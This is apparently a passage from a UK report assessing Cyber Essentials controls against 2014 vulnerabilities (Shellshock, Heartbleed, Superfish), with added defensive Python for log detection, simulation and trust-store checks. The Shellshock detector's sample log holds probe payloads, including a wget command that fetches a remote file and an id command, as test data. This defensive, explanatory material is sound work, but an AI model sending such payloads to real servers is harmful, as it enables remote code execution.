Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.

Survey Responses


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in 2014 and early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

“ShellShock”

Also known by the name “Bashdoor”, Shellshock hit the news as it affected the Linux and Unix server environment and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The bug allowed attackers to execute arbitrary shell commands on a target system by supplying a crafted environment variable: a value beginning with a function definition, followed by further commands that a vulnerable Bash ran as it imported the variable. The bug was not enough by itself to compromise a system; it needed another service that passed attacker-controlled data into the environment of a Bash process, such as a CGI web application (where request headers become environment variables), an OpenSSH ForceCommand restriction or a DHCP client. Where such a service existed the results could be devastating, as the attacker's commands run with that service's privileges and lay the entire system open to many other forms of attack.

The threat was particularly insidious for SMEs that used Linux/Unix based servers for services, mail servers for example, as they would potentially have no idea that they had been compromised.
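Two checks a practitioner would want for the exposure described above, as an added Python example that is not code from the report: a web-log detector that looks for the function-definition prefix in the request headers that CGI turns into environment variables, and the widely published local self-test for CVE-2014-6271. The log lines are constructed for illustration, and the log format assumed is Apache's combined format.

```python
"""Shellshock (CVE-2014-6271) checks: a local Bash test and a web-log detector.

Added example, not code from the Security Lancaster report. The log lines are
constructed for illustration. The detector relies on how CGI exposes request
headers to scripts: Apache's mod_cgi copies headers such as User-Agent and
Referer into environment variables, so a header value beginning with the Bash
function-definition prefix "() {" is exactly what reached a vulnerable Bash.
"""
import re
import subprocess

# A value that starts with "() {" followed by further commands triggered the
# bug when a vulnerable Bash imported it from the environment.
SHELLSHOCK_MARKER = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not real traffic): two probes and one benign hit.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :;}; /bin/bash -c \'wget http://203.0.113.5/x -O /tmp/x\'"',
    '198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 64 '
    '"() { ignored; }; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.37.0"',
]


def find_shellshock_probes(lines):
    """Return (client_ip, request_line, header) for every log line whose Referer
    or User-Agent carries the function-definition marker."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for header in ("referer", "ua"):
            if SHELLSHOCK_MARKER.search(m.group(header)):
                hits.append((m.group("ip"), m.group("req"), header))
                break
    return hits


def bash_is_vulnerable(bash="bash"):
    """Run the widely published CVE-2014-6271 self-test against a local Bash.

    Returns True if the trailing command in the crafted variable executed,
    False if Bash is patched (it only echoes "test"), None if Bash is absent.
    """
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        proc = subprocess.run([bash, "-c", "echo test"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in proc.stdout


if __name__ == "__main__":
    for ip, req, header in find_shellshock_probes(SAMPLE_LOG_LINES):
        print(f"shellshock probe from {ip} in {header}: {req}")
    print("local bash vulnerable:", bash_is_vulnerable())
```

The detector only inspects the two headers that the combined log format records; probes can arrive in any header that the CGI module exports (Cookie, Host, custom headers), so on a real server the same marker should be searched across full request headers where they are logged.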

“Heartbleed”

Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to read the memory of a target's OpenSSL process through a buffer over-read: a heartbeat request could claim a payload far larger than it actually carried (up to 64 KB per request), and an unpatched server replied with that many bytes copied from wherever the payload sat in memory. This allowed attackers to access private credentials (private keys, session cookies, passwords, or indeed anything else) in the RAM of the target, repeatedly and silently.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as yet unpatched servers still online) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on their individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects. Patching is also only the first step: any private key, certificate, password or session that could have been read from memory while the server was vulnerable should be treated as compromised and be revoked, reissued or reset once the patch is in place.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
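The over-read described above reduced to the length check at its heart, as an added Python example that is not code from the report or from OpenSSL: one handler trusts the payload length the peer claims, the other applies the bounds check that OpenSSL 1.0.1g added. The heartbeat messages and the stand-in for process memory are constructed; the handler names and the simulated memory layout are this example's own assumptions.

```python
"""Heartbleed (CVE-2014-0160) as a missing length check, simulated in Python.

Added example, not code from the report or from OpenSSL. It models the TLS
Heartbeat message (RFC 6520): type (1 byte), payload_length (2 bytes),
payload, then at least 16 bytes of padding. A vulnerable handler copies
payload_length bytes from the payload's position in memory without checking
that they lie inside the received record; the fixed handler checks first.
HEAP_TAIL is a constructed stand-in for whatever followed the record in the
OpenSSL process's memory.
"""
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16  # RFC 6520 requires at least 16 bytes of padding

# Constructed "memory after the record": a session key and a cookie here.
HEAP_TAIL = b"...SESSION-KEY=7a9f3c1e...Cookie: auth=eyJhbGciOi...\x00" * 4


def build_heartbeat(payload, claimed_length=None):
    """Build a heartbeat request record. claimed_length lets the sender lie
    about the payload size, which is exactly what the attack does."""
    if claimed_length is None:
        claimed_length = len(payload)
    header = struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length)
    return header + payload + b"\x00" * PADDING_LEN


def heartbeat_vulnerable(record, memory_after_record):
    """Pre-1.0.1g behaviour: echo payload_length bytes starting at the payload,
    running past the end of the record into adjacent process memory."""
    hb_type, payload_length = struct.unpack("!BH", record[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    # The memcpy source is the payload inside the record buffer; bytes beyond
    # the record are whatever happened to sit next to it on the heap.
    source = record[3:] + memory_after_record
    echoed = source[:payload_length]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + echoed


def heartbeat_fixed(record, memory_after_record):
    """1.0.1g behaviour: discard the record if 1 + 2 + payload_length + 16
    exceeds the record length (the check added by the Heartbleed fix)."""
    hb_type, payload_length = struct.unpack("!BH", record[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if 1 + 2 + payload_length + PADDING_LEN > len(record):
        return None  # silently drop, as RFC 6520 section 4 requires
    echoed = record[3:3 + payload_length]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + echoed


def leaked_bytes(response, honest_payload):
    """Bytes in a response beyond what the peer legitimately sent."""
    if response is None:
        return b""
    return response[3 + len(honest_payload):]


if __name__ == "__main__":
    lying = build_heartbeat(b"hello", claimed_length=1000)
    leak = leaked_bytes(heartbeat_vulnerable(lying, HEAP_TAIL), b"hello")
    print("vulnerable handler leaked", len(leak), "bytes:", leak[:60])
    print("fixed handler reply:", heartbeat_fixed(lying, HEAP_TAIL))
```

The simulation makes the remediation point above concrete: nothing in the leaked bytes is tied to a log entry or an alert, so after patching, the only safe assumption is that anything that was in memory (keys, cookies, passwords) has been read.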

“Superfish”

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and it hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is the Superfish software, which breaks the chain of trust for SSL certificates by installing its own self-signed root CA certificate into the list of trusted certificates on the host machine. Every installation shares that root certificate and its private key, and the key can easily be extracted from any other machine running Superfish. An attacker holding it can sign a certificate for any server name and present it to the target machine, which accepts it as trusted, and so read and modify any SSL-secured connection from that machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and the issue is fully mitigated through the Cyber Essentials patch management advice, provided the administrators know that the tool exists and must be run (see the caveat under Threat Analysis below).
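A check for the trust-store side of this issue, which routine patching does not cover, as an added Python example that is not code from the report or from Lenovo's removal tool. It flags trusted root certificates whose subject or issuer matches names taken from the CVE text above (Superfish, Komodia, VisualDiscovery); the certificate records are constructed in the dictionary shape that Python's ssl module returns, and the pattern list is an assumption to extend for your own environment.

```python
"""Flag vendor-installed root CAs such as Superfish in the trust store.

Added example; not from the report or from Lenovo's removal tool. The sample
entries below are constructed in the shape ssl.SSLContext.get_ca_certs()
returns. The suspect names come from the CVE-2015-2077 text (Superfish,
Komodia, VisualDiscovery); the list is an assumption and should be extended
per local policy.
"""
import re
import ssl

# Name fragments that should never appear on a trusted root of a managed
# workstation (assumed list; extend with any other known interception CA).
SUSPECT_PATTERNS = [re.compile(p, re.IGNORECASE)
                    for p in (r"superfish", r"komodia", r"visualdiscovery")]

# Constructed records mirroring ssl.get_ca_certs() output (not real roots).
SAMPLE_ROOTS = [
    {"subject": ((("countryName", "US"),),
                 (("organizationName", "Superfish, Inc."),),
                 (("commonName", "Superfish, Inc."),)),
     "issuer": ((("countryName", "US"),),
                (("organizationName", "Superfish, Inc."),),
                (("commonName", "Superfish, Inc."),)),
     "notAfter": "May  4 12:00:00 2034 GMT", "serialNumber": "01"},
    {"subject": ((("countryName", "US"),),
                 (("organizationName", "Example Trust Services"),),
                 (("commonName", "Example Root CA"),)),
     "issuer": ((("countryName", "US"),),
                (("organizationName", "Example Trust Services"),),
                (("commonName", "Example Root CA"),)),
     "notAfter": "Jan  1 00:00:00 2030 GMT", "serialNumber": "02"},
]


def name_to_str(rdns):
    """Flatten the nested RDN tuples the ssl module uses into 'k=v, k=v'."""
    return ", ".join(f"{k}={v}" for rdn in rdns for k, v in rdn)


def suspicious_roots(certs, patterns=SUSPECT_PATTERNS):
    """Return the subject string of every root whose subject or issuer
    matches one of the suspect patterns."""
    found = []
    for cert in certs:
        subject = name_to_str(cert.get("subject", ()))
        issuer = name_to_str(cert.get("issuer", ()))
        if any(p.search(subject) or p.search(issuer) for p in patterns):
            found.append(subject)
    return found


def scan_system_roots():
    """Apply the check to the roots Python's default SSL context trusts on
    this host (the OS store on Windows, the OpenSSL bundle elsewhere)."""
    ctx = ssl.create_default_context()
    ctx.load_default_certs()
    return suspicious_roots(ctx.get_ca_certs())


if __name__ == "__main__":
    print("sample store:", suspicious_roots(SAMPLE_ROOTS))
    print("this host:", scan_system_roots())
```

A match is a finding, not a clean bill of health in its absence: interception software can install a root under an innocuous name, so the same scan should also be run against an allowlist of the roots a workstation build is expected to carry.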

Threat Analysis

ShellShock. Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed. The ‘Heartbleed’ bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines, to the extent that those controls reach the affected systems: where the vulnerable OpenSSL runs on an external provider's servers, the mitigation depends on that provider applying the patch, which is why CVE-2014-0160 is rated only partially mitigated in the Cyber Controls Applicability table.

Superfish. All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the fix, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials security controls have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits could not be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials controls perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry, and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note must be made regarding the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (some 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use among SMEs. The controls most used at present could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls, while patch management is not necessarily understood by individuals as a tool that greatly improves cyber security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that anti-malware is largely the only security tool that routinely scans network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber safety.

Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160, aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271, aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077, aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE | Mitigating controls
--- | --- | --- | --- | --- | --- | --- | --- | ---
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
